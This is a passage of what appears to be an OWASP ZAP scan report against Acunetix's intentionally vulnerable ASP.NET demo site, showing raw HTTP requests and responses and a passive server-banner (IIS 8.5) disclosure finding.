Request Body - size: 1,161 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTIyMzk2OTgxMQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ9jYlBlcnNpc3RDb29raWVzwbv%2BQ8XadeewSqHhJbH9z4dvJw%3D%3D&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTVALIDATION=%2FwEWWwLoz%2FfGCgLStq24BwK3jsrkBALtuvfLDQKC3IeGDAL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBG0lSndyVrygwyPPM%2FuCBtd%2Bn7UP&tbUsername=ZAP&tbPassword=ZAP&cbPersistCookie=on&btnLogin=Login
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:16 GMT Content-Length: 13433
Response Body - size: 13,433 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>login</title> <meta name="vs_showGrid" content="True"> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="frmLogin" method="post" action="login.aspx" id="frmLogin"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTIyMzk2OTgxMQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ9jYlBlcnNpc3RDb29raWVzwbv+Q8XadeewSqHhJbH9z4dvJw==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['frmLogin']; if (!theForm) { theForm = document.frmLogin; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="C2EE9ABB" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWwLoz/fGCgLStq24BwK3jsrkBALtuvfLDQKC3IeGDAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBG0lSndyVrygwyPPM/uCBtd+n7UP" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top" align="center"> <TABLE id="Table2" cellSpacing="0" cellPadding="5" border="0" align="center" class="FramedForm"> <TR> <TD>Username:</TD> <TD align="right"> <input name="tbUsername" type="text" value="ZAP" id="tbUsername" class="Login" /></TD> </TR> <TR> <TD>Password:</TD> <TD align="right"> <input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD> </TR> <TR> <TD align="left" colSpan="2"><input name="cbPersistCookie" type="checkbox" id="cbPersistCookie" checked="checked" class="classic" /> Remember me </TD> </TR> <TR> <TD></TD> <TD align="right"> <input type="submit" name="btnLogin" value="Login" id="btnLogin" /></TD> </TR> </TABLE> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?id=0
Method	POST
Parameter
Attack
Evidence	Microsoft-IIS/8.5
Show / hide Request and Response
Request Header - size: 421 bytes.	POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=0 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?id=0 Content-Length: 6507 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 6,507 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA%2BPHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc%2BICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8%2BbmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A%2BICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A%2BICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A%2BICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA%2BLSBTdXBwb3J0IGZvciBJUHY2PGJyIC8%2BICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8%2BICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8%2BICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA%2BVGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E%2BLjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A%2BICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BVXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc%2BQWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BRm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A%2BZAIJDw8WAh4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg%2FaWQ9MGRkAgsPFgIeA3NyY2RkZPOqH8VRVGFvH0VwpHODsgDXKZTi&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwKP1p3RBAL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBNw4dcQo8tH%2F%2FaNq1Q9scKgXRi5G
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:17 GMT Content-Length: 22875
Response Body - size: 22,875 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?id=0" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" 